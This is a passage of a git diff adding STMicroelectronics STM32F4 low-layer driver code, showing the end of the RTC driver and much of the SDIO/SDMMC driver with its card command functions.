Settings : Mask = all fields are not masked */ + RTC_AlarmStruct->AlarmMask = LL_RTC_ALMB_MASK_NONE; +} + +/** + * @brief Enters the RTC Initialization mode. + * @note The RTC Initialization mode is write protected, use the + * @ref LL_RTC_DisableWriteProtection before calling this function. + * @param RTCx RTC Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC is in Init mode + * - ERROR: RTC is not in Init mode + */ +ErrorStatus LL_RTC_EnterInitMode(RTC_TypeDef *RTCx) +{ + __IO uint32_t timeout = RTC_INITMODE_TIMEOUT; + ErrorStatus status = SUCCESS; + uint32_t tmp = 0U; + + /* Check the parameter */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + + /* Check if the Initialization mode is set */ + if (LL_RTC_IsActiveFlag_INIT(RTCx) == 0U) + { + /* Set the Initialization mode */ + LL_RTC_EnableInitMode(RTCx); + + /* Wait till RTC is in INIT state and if Time out is reached exit */ + tmp = LL_RTC_IsActiveFlag_INIT(RTCx); + while ((timeout != 0U) && (tmp != 1U)) + { + if (LL_SYSTICK_IsActiveCounterFlag() == 1U) + { + timeout --; + } + tmp = LL_RTC_IsActiveFlag_INIT(RTCx); + if (timeout == 0U) + { + status = ERROR; + } + } + } + return status; +} + +/** + * @brief Exit the RTC Initialization mode. + * @note When the initialization sequence is complete, the calendar restarts + * counting after 4 RTCCLK cycles. + * @note The RTC Initialization mode is write protected, use the + * @ref LL_RTC_DisableWriteProtection before calling this function. + * @param RTCx RTC Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC exited from in Init mode + * - ERROR: Not applicable + */ +ErrorStatus LL_RTC_ExitInitMode(RTC_TypeDef *RTCx) +{ + /* Check the parameter */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + + /* Disable initialization mode */ + LL_RTC_DisableInitMode(RTCx); + + return SUCCESS; +} + +/** + * @brief Waits until the RTC Time and Day registers (RTC_TR and RTC_DR) are + * synchronized with RTC APB clock. + * @note The RTC Resynchronization mode is write protected, use the + * @ref LL_RTC_DisableWriteProtection before calling this function. + * @note To read the calendar through the shadow registers after Calendar + * initialization, calendar update or after wakeup from low power modes + * the software must first clear the RSF flag. + * The software must then wait until it is set again before reading + * the calendar, which means that the calendar registers have been + * correctly copied into the RTC_TR and RTC_DR shadow registers. + * @param RTCx RTC Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC registers are synchronised + * - ERROR: RTC registers are not synchronised + */ +ErrorStatus LL_RTC_WaitForSynchro(RTC_TypeDef *RTCx) +{ + __IO uint32_t timeout = RTC_SYNCHRO_TIMEOUT; + ErrorStatus status = SUCCESS; + uint32_t tmp = 0U; + + /* Check the parameter */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + + /* Clear RSF flag */ + LL_RTC_ClearFlag_RS(RTCx); + + /* Wait the registers to be synchronised */ + tmp = LL_RTC_IsActiveFlag_RS(RTCx); + while ((timeout != 0U) && (tmp != 0U)) + { + if (LL_SYSTICK_IsActiveCounterFlag() == 1U) + { + timeout--; + } + tmp = LL_RTC_IsActiveFlag_RS(RTCx); + if (timeout == 0U) + { + status = ERROR; + } + } + + if (status != ERROR) + { + timeout = RTC_SYNCHRO_TIMEOUT; + tmp = LL_RTC_IsActiveFlag_RS(RTCx); + while ((timeout != 0U) && (tmp != 1U)) + { + if (LL_SYSTICK_IsActiveCounterFlag() == 1U) + { + timeout--; + } + tmp = LL_RTC_IsActiveFlag_RS(RTCx); + if (timeout == 0U) + { + status = ERROR; + } + } + } + + return (status); +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined(RTC) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_sdmmc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_sdmmc.c new file mode 100644 index 000000000..ff89435bf --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_sdmmc.c @@ -0,0 +1,1547 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_sdmmc.c + * @author MCD Application Team + * @brief SDMMC Low Layer HAL module driver. + * + * This file provides firmware functions to manage the following + * functionalities of the SDMMC peripheral: + * + Initialization/de-initialization functions + * + I/O operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### SDMMC peripheral features ##### + ============================================================================== + [..] The SD/SDMMC MMC card host interface (SDMMC) provides an interface between the AHB + peripheral bus and MultiMedia cards (MMCs), SD memory cards, SDMMC cards and CE-ATA + devices. + + [..] The SDMMC features include the following: + (+) Full compliance with MultiMedia Card System Specification Version 4.2. Card support + for three different databus modes: 1-bit (default), 4-bit and 8-bit + (+) Full compatibility with previous versions of MultiMedia Cards (forward compatibility) + (+) Full compliance with SD Memory Card Specifications Version 2.0 + (+) Full compliance with SD I/O Card Specification Version 2.0: card support for two + different data bus modes: 1-bit (default) and 4-bit + (+) Full support of the CE-ATA features (full compliance with CE-ATA digital protocol + Rev1.1) + (+) Data transfer up to 48 MHz for the 8 bit mode + (+) Data and command output enable signals to control external bidirectional drivers + + ##### How to use this driver ##### + ============================================================================== + [..] + This driver is a considered as a driver of service for external devices drivers + that interfaces with the SDMMC peripheral. + According to the device used (SD card/ MMC card / SDMMC card ...), a set of APIs + is used in the device's driver to perform SDMMC operations and functionalities. + + This driver is almost transparent for the final user, it is only used to implement other + functionalities of the external device. + + [..] + (+) The SDMMC clock (SDMMCCLK = 48 MHz) is coming from a specific output (MSI, PLLUSB1CLK, + PLLUSB2CLK). Before start working with SDMMC peripheral make sure that the + PLL is well configured. + The SDMMC peripheral uses two clock signals: + (++) SDMMC adapter clock (SDMMCCLK = 48 MHz) + (++) APB2 bus clock (PCLK2) + + -@@- PCLK2 and SDMMC_CK clock frequencies must respect the following condition: + Frequency(PCLK2) >= (3 / 8 x Frequency(SDMMC_CK)) + + (+) Enable/Disable peripheral clock using RCC peripheral macros related to SDMMC + peripheral. + + (+) Enable the Power ON State using the SDIO_PowerState_ON() + function and disable it using the function SDIO_PowerState_OFF(). + + (+) Enable/Disable the clock using the __SDIO_ENABLE()/__SDIO_DISABLE() macros. + + (+) Enable/Disable the peripheral interrupts using the macros __SDIO_ENABLE_IT() + and __SDIO_DISABLE_IT() if you need to use interrupt mode. + + (+) When using the DMA mode + (++) Configure the DMA in the MSP layer of the external device + (++) Active the needed channel Request + (++) Enable the DMA using __SDIO_DMA_ENABLE() macro or Disable it using the macro + __SDIO_DMA_DISABLE(). + + (+) To control the CPSM (Command Path State Machine) and send + commands to the card use the SDIO_SendCommand(), + SDIO_GetCommandResponse() and SDIO_GetResponse() functions. First, user has + to fill the command structure (pointer to SDIO_CmdInitTypeDef) according + to the selected command to be sent. + The parameters that should be filled are: + (++) Command Argument + (++) Command Index + (++) Command Response type + (++) Command Wait + (++) CPSM Status (Enable or Disable). + + -@@- To check if the command is well received, read the SDIO_CMDRESP + register using the SDIO_GetCommandResponse(). + The SDMMC responses registers (SDIO_RESP1 to SDIO_RESP2), use the + SDIO_GetResponse() function. + + (+) To control the DPSM (Data Path State Machine) and send/receive + data to/from the card use the SDIO_DataConfig(), SDIO_GetDataCounter(), + SDIO_ReadFIFO(), SDIO_WriteFIFO() and SDIO_GetFIFOCount() functions. + + *** Read Operations *** + ======================= + [..] + (#) First, user has to fill the data structure (pointer to + SDIO_DataInitTypeDef) according to the selected data type to be received. + The parameters that should be filled are: + (++) Data TimeOut + (++) Data Length + (++) Data Block size + (++) Data Transfer direction: should be from card (To SDMMC) + (++) Data Transfer mode + (++) DPSM Status (Enable or Disable) + + (#) Configure the SDMMC resources to receive the data from the card + according to selected transfer mode (Refer to Step 8, 9 and 10). + + (#) Send the selected Read command (refer to step 11). + + (#) Use the SDIO flags/interrupts to check the transfer status. + + *** Write Operations *** + ======================== + [..] + (#) First, user has to fill the data structure (pointer to + SDIO_DataInitTypeDef) according to the selected data type to be received. + The parameters that should be filled are: + (++) Data TimeOut + (++) Data Length + (++) Data Block size + (++) Data Transfer direction: should be to card (To CARD) + (++) Data Transfer mode + (++) DPSM Status (Enable or Disable) + + (#) Configure the SDMMC resources to send the data to the card according to + selected transfer mode. + + (#) Send the selected Write command. + + (#) Use the SDIO flags/interrupts to check the transfer status. + + *** Command management operations *** + ===================================== + [..] + (#) The commands used for Read/Write/Erase operations are managed in + separate functions. + Each function allows to send the needed command with the related argument, + then check the response. + By the same approach, you could implement a command and check the response. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +#if defined(SDIO) + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SDMMC_LL SDMMC Low Layer + * @brief Low layer module for SD + * @{ + */ + +#if defined(HAL_SD_MODULE_ENABLED) || defined(HAL_MMC_MODULE_ENABLED) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +static uint32_t SDMMC_GetCmdError(SDIO_TypeDef *SDIOx); +static uint32_t SDMMC_GetCmdResp1(SDIO_TypeDef *SDIOx, uint8_t SD_CMD, uint32_t Timeout); +static uint32_t SDMMC_GetCmdResp2(SDIO_TypeDef *SDIOx); +static uint32_t SDMMC_GetCmdResp3(SDIO_TypeDef *SDIOx); +static uint32_t SDMMC_GetCmdResp7(SDIO_TypeDef *SDIOx); +static uint32_t SDMMC_GetCmdResp6(SDIO_TypeDef *SDIOx, uint8_t SD_CMD, uint16_t *pRCA); + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup SDMMC_LL_Exported_Functions SDMMC Low Layer Exported Functions + * @{ + */ + +/** @defgroup HAL_SDMMC_LL_Group1 Initialization de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization/de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the SDMMC according to the specified + * parameters in the SDMMC_InitTypeDef and create the associated handle. + * @param SDIOx: Pointer to SDMMC register base + * @param Init: SDMMC initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef SDIO_Init(SDIO_TypeDef *SDIOx, SDIO_InitTypeDef Init) +{ + uint32_t tmpreg = 0; + + /* Check the parameters */ + assert_param(IS_SDIO_ALL_INSTANCE(SDIOx)); + assert_param(IS_SDIO_CLOCK_EDGE(Init.ClockEdge)); + assert_param(IS_SDIO_CLOCK_BYPASS(Init.ClockBypass)); + assert_param(IS_SDIO_CLOCK_POWER_SAVE(Init.ClockPowerSave)); + assert_param(IS_SDIO_BUS_WIDE(Init.BusWide)); + assert_param(IS_SDIO_HARDWARE_FLOW_CONTROL(Init.HardwareFlowControl)); + assert_param(IS_SDIO_CLKDIV(Init.ClockDiv)); + + /* Set SDMMC configuration parameters */ + tmpreg |= (Init.ClockEdge |\ + Init.ClockBypass |\ + Init.ClockPowerSave |\ + Init.BusWide |\ + Init.HardwareFlowControl |\ + Init.ClockDiv + ); + + /* Write to SDMMC CLKCR */ + MODIFY_REG(SDIOx->CLKCR, CLKCR_CLEAR_MASK, tmpreg); + + return HAL_OK; +} + + +/** + * @} + */ + +/** @defgroup HAL_SDMMC_LL_Group2 IO operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### I/O operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the SDMMC data + transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Read data (word) from Rx FIFO in blocking mode (polling) + * @param SDIOx: Pointer to SDMMC register base + * @retval HAL status + */ +uint32_t SDIO_ReadFIFO(SDIO_TypeDef *SDIOx) +{ + /* Read data from Rx FIFO */ + return (SDIOx->FIFO); +} + +/** + * @brief Write data (word) to Tx FIFO in blocking mode (polling) + * @param SDIOx: Pointer to SDMMC register base + * @param pWriteData: pointer to data to write + * @retval HAL status + */ +HAL_StatusTypeDef SDIO_WriteFIFO(SDIO_TypeDef *SDIOx, uint32_t *pWriteData) +{ + /* Write data to FIFO */ + SDIOx->FIFO = *pWriteData; + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup HAL_SDMMC_LL_Group3 Peripheral Control functions + * @brief management functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the SDMMC data + transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Set SDMMC Power state to ON. + * @param SDIOx: Pointer to SDMMC register base + * @retval HAL status + */ +HAL_StatusTypeDef SDIO_PowerState_ON(SDIO_TypeDef *SDIOx) +{ + /* Set power state to ON */ + SDIOx->POWER = SDIO_POWER_PWRCTRL; + + /* 1ms: required power up waiting time before starting the SD initialization + sequence */ + HAL_Delay(2); + + return HAL_OK; +} + +/** + * @brief Set SDMMC Power state to OFF. + * @param SDIOx: Pointer to SDMMC register base + * @retval HAL status + */ +HAL_StatusTypeDef SDIO_PowerState_OFF(SDIO_TypeDef *SDIOx) +{ + /* Set power state to OFF */ + SDIOx->POWER = (uint32_t)0x00000000; + + return HAL_OK; +} + +/** + * @brief Get SDMMC Power state. + * @param SDIOx: Pointer to SDMMC register base + * @retval Power status of the controller. The returned value can be one of the + * following values: + * - 0x00: Power OFF + * - 0x02: Power UP + * - 0x03: Power ON + */ +uint32_t SDIO_GetPowerState(SDIO_TypeDef *SDIOx) +{ + return (SDIOx->POWER & SDIO_POWER_PWRCTRL); +} + +/** + * @brief Configure the SDMMC command path according to the specified parameters in + * SDIO_CmdInitTypeDef structure and send the command + * @param SDIOx: Pointer to SDMMC register base + * @param Command: pointer to a SDIO_CmdInitTypeDef structure that contains + * the configuration information for the SDMMC command + * @retval HAL status + */ +HAL_StatusTypeDef SDIO_SendCommand(SDIO_TypeDef *SDIOx, SDIO_CmdInitTypeDef *Command) +{ + uint32_t tmpreg = 0; + + /* Check the parameters */ + assert_param(IS_SDIO_CMD_INDEX(Command->CmdIndex)); + assert_param(IS_SDIO_RESPONSE(Command->Response)); + assert_param(IS_SDIO_WAIT(Command->WaitForInterrupt)); + assert_param(IS_SDIO_CPSM(Command->CPSM)); + + /* Set the SDMMC Argument value */ + SDIOx->ARG = Command->Argument; + + /* Set SDMMC command parameters */ + tmpreg |= (uint32_t)(Command->CmdIndex |\ + Command->Response |\ + Command->WaitForInterrupt |\ + Command->CPSM); + + /* Write to SDMMC CMD register */ + MODIFY_REG(SDIOx->CMD, CMD_CLEAR_MASK, tmpreg); + + return HAL_OK; +} + +/** + * @brief Return the command index of last command for which response received + * @param SDIOx: Pointer to SDMMC register base + * @retval Command index of the last command response received + */ +uint8_t SDIO_GetCommandResponse(SDIO_TypeDef *SDIOx) +{ + return (uint8_t)(SDIOx->RESPCMD); +} + + +/** + * @brief Return the response received from the card for the last command + * @param SDIOx: Pointer to SDMMC register base + * @param Response: Specifies the SDMMC response register. + * This parameter can be one of the following values: + * @arg SDIO_RESP1: Response Register 1 + * @arg SDIO_RESP2: Response Register 2 + * @arg SDIO_RESP3: Response Register 3 + * @arg SDIO_RESP4: Response Register 4 + * @retval The Corresponding response register value + */ +uint32_t SDIO_GetResponse(SDIO_TypeDef *SDIOx, uint32_t Response) +{ + uint32_t tmp; + + /* Check the parameters */ + assert_param(IS_SDIO_RESP(Response)); + + /* Get the response */ + tmp = (uint32_t)(&(SDIOx->RESP1)) + Response; + + return (*(__IO uint32_t *) tmp); +} + +/** + * @brief Configure the SDMMC data path according to the specified + * parameters in the SDIO_DataInitTypeDef. + * @param SDIOx: Pointer to SDIO register base + * @param Data : pointer to a SDIO_DataInitTypeDef structure + * that contains the configuration information for the SDMMC data. + * @retval HAL status + */ +HAL_StatusTypeDef SDIO_ConfigData(SDIO_TypeDef *SDIOx, SDIO_DataInitTypeDef* Data) +{ + uint32_t tmpreg = 0; + + /* Check the parameters */ + assert_param(IS_SDIO_DATA_LENGTH(Data->DataLength)); + assert_param(IS_SDIO_BLOCK_SIZE(Data->DataBlockSize)); + assert_param(IS_SDIO_TRANSFER_DIR(Data->TransferDir)); + assert_param(IS_SDIO_TRANSFER_MODE(Data->TransferMode)); + assert_param(IS_SDIO_DPSM(Data->DPSM)); + + /* Set the SDMMC Data TimeOut value */ + SDIOx->DTIMER = Data->DataTimeOut; + + /* Set the SDMMC DataLength value */ + SDIOx->DLEN = Data->DataLength; + + /* Set the SDMMC data configuration parameters */ + tmpreg |= (uint32_t)(Data->DataBlockSize |\ + Data->TransferDir |\ + Data->TransferMode |\ + Data->DPSM); + + /* Write to SDMMC DCTRL */ + MODIFY_REG(SDIOx->DCTRL, DCTRL_CLEAR_MASK, tmpreg); + + return HAL_OK; + +} + +/** + * @brief Returns number of remaining data bytes to be transferred. + * @param SDIOx: Pointer to SDIO register base + * @retval Number of remaining data bytes to be transferred + */ +uint32_t SDIO_GetDataCounter(SDIO_TypeDef *SDIOx) +{ + return (SDIOx->DCOUNT); +} + +/** + * @brief Get the FIFO data + * @param SDIOx: Pointer to SDIO register base + * @retval Data received + */ +uint32_t SDIO_GetFIFOCount(SDIO_TypeDef *SDIOx) +{ + return (SDIOx->FIFO); +} + +/** + * @brief Sets one of the two options of inserting read wait interval. + * @param SDIOx: Pointer to SDIO register base + * @param SDIO_ReadWaitMode: SDMMC Read Wait operation mode. + * This parameter can be: + * @arg SDIO_READ_WAIT_MODE_CLK: Read Wait control by stopping SDMMCCLK + * @arg SDIO_READ_WAIT_MODE_DATA2: Read Wait control using SDMMC_DATA2 + * @retval None + */ +HAL_StatusTypeDef SDIO_SetSDMMCReadWaitMode(SDIO_TypeDef *SDIOx, uint32_t SDIO_ReadWaitMode) +{ + /* Check the parameters */ + assert_param(IS_SDIO_READWAIT_MODE(SDIO_ReadWaitMode)); + + /* Set SDMMC read wait mode */ + MODIFY_REG(SDIOx->DCTRL, SDIO_DCTRL_RWMOD, SDIO_ReadWaitMode); + + return HAL_OK; +} + +/** + * @} + */ + + +/** @defgroup HAL_SDMMC_LL_Group4 Command management functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### Commands management functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the needed commands. + +@endverbatim + * @{ + */ + +/** + * @brief Send the Data Block Length command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdBlockLength(SDIO_TypeDef *SDIOx, uint32_t BlockSize) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)BlockSize; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SET_BLOCKLEN; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SET_BLOCKLEN, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Read Single Block command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdReadSingleBlock(SDIO_TypeDef *SDIOx, uint32_t ReadAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)ReadAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_READ_SINGLE_BLOCK; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_READ_SINGLE_BLOCK, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Read Multi Block command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdReadMultiBlock(SDIO_TypeDef *SDIOx, uint32_t ReadAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)ReadAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_READ_MULT_BLOCK; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_READ_MULT_BLOCK, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Write Single Block command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdWriteSingleBlock(SDIO_TypeDef *SDIOx, uint32_t WriteAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)WriteAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_WRITE_SINGLE_BLOCK; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_WRITE_SINGLE_BLOCK, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Write Multi Block command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdWriteMultiBlock(SDIO_TypeDef *SDIOx, uint32_t WriteAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)WriteAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_WRITE_MULT_BLOCK; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_WRITE_MULT_BLOCK, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Start Address Erase command for SD and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdSDEraseStartAdd(SDIO_TypeDef *SDIOx, uint32_t StartAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)StartAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SD_ERASE_GRP_START; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SD_ERASE_GRP_START, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the End Address Erase command for SD and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdSDEraseEndAdd(SDIO_TypeDef *SDIOx, uint32_t EndAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)EndAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SD_ERASE_GRP_END; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SD_ERASE_GRP_END, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Start Address Erase command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdEraseStartAdd(SDIO_TypeDef *SDIOx, uint32_t StartAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)StartAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_ERASE_GRP_START; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_ERASE_GRP_START, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the End Address Erase command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdEraseEndAdd(SDIO_TypeDef *SDIOx, uint32_t EndAdd) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = (uint32_t)EndAdd; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_ERASE_GRP_END; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_ERASE_GRP_END, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Erase command and check the response + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdErase(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Set Block Size for Card */ + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_ERASE; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_ERASE, SDIO_MAXERASETIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Stop Transfer command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdStopTransfer(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD12 STOP_TRANSMISSION */ + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_STOP_TRANSMISSION; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_STOP_TRANSMISSION, SDIO_STOPTRANSFERTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Select Deselect command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @param addr: Address of the card to be selected + * @retval HAL status + */ +uint32_t SDMMC_CmdSelDesel(SDIO_TypeDef *SDIOx, uint64_t Addr) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD7 SDMMC_SEL_DESEL_CARD */ + sdmmc_cmdinit.Argument = (uint32_t)Addr; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SEL_DESEL_CARD; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SEL_DESEL_CARD, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Go 